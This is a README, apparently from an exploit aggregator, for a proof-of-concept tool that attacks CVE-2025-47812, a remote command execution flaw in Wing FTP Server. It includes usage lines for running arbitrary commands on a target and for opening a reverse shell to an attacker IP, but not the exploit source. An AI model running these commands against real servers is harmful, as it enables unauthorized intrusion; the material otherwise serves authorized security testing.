Share
## https://sploitus.com/exploit?id=80188E75-6D7C-5948-9425-B2436CA35A22
# CVE-2025-47812 - Wing FTP Server RCE Exploit

This repository provides a proof-of-concept exploit for **CVE-2025-47812**, a remote command execution (RCE) vulnerability in **Wing FTP Server**. An attacker can inject and execute arbitrary Lua-based system commands by abusing the `username` parameter during authentication, resulting in full remote code execution.

---

## ๐Ÿ“Œ Exploit Features

- ๐Ÿ”ง Remote execution of custom shell commands
- ๐Ÿงฌ Multiple built-in reverse shell payloads (bash, Python, netcat, etc.)
- ๐Ÿชช Automatic UID extraction from Set-Cookie
- ๐Ÿ“ฆ Logs successful UIDs to `found_uids.txt`
- ๐Ÿงช Dry-run mode (no actual requests sent โ€” test your input/output logic safely)
- ๐Ÿ” Retry logic on network failure
- ๐Ÿงน Cleaner payload formatting and readable output
- โœ… Input validation for IPs, ports, and URLs
- โš™๏ธ Command-line argument support for automated workflows

---

## ๐Ÿ’ป Usage

**Execute a simple shell command:**
```bash
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"
```
Trigger a reverse shell:
```
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444
```
Dry-run mode (no requests will be sent):
```
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run
```

## ๐Ÿ”„ Changes Made to the Original Exploit

| Feature/Improvement       | Description                                                                 |
|---------------------------|-----------------------------------------------------------------------------|
| โœ… **Argument Parsing**    | Added `argparse` CLI support for non-interactive mode                       |
| ๐Ÿ” **Input Validation**    | Ensures valid URL/IP/port before attempting exploit                         |
| ๐Ÿ“ฆ **Header Refactoring** | Extracted HTTP headers into a reusable function for consistency             |
| ๐Ÿ“„ **UID Logging**         | Saves successful UID tokens to `found_uids.txt`                            |
| ๐Ÿงช **Dry-Run Mode**        | Allows safe testing without sending requests (`--dry-run`)                  |
| ๐Ÿ•’ **Timeout + Retries**   | Adds request timeout and automatic retry attempts on failure                |
| ๐Ÿงผ **Payload Readability** | Reformatted the Lua injection string for clarity and maintenance            |
| ๐Ÿ“Š **Structured Output**   | Wrapped server responses and payload info with delimiters for easy reading  |
| โš ๏ธ **Status Code Checks** | Warns user if the target returns unexpected HTTP status codes               |
| ๐Ÿ“ **Logging System**      | Replaces `print()` with Python `logging` module for better verbosity control|

---

## โš ๏ธ Disclaimer

This project is intended for **educational and authorized security testing only**.  
Do **not** use this tool against systems you do not own or have explicit permission to test.

---

---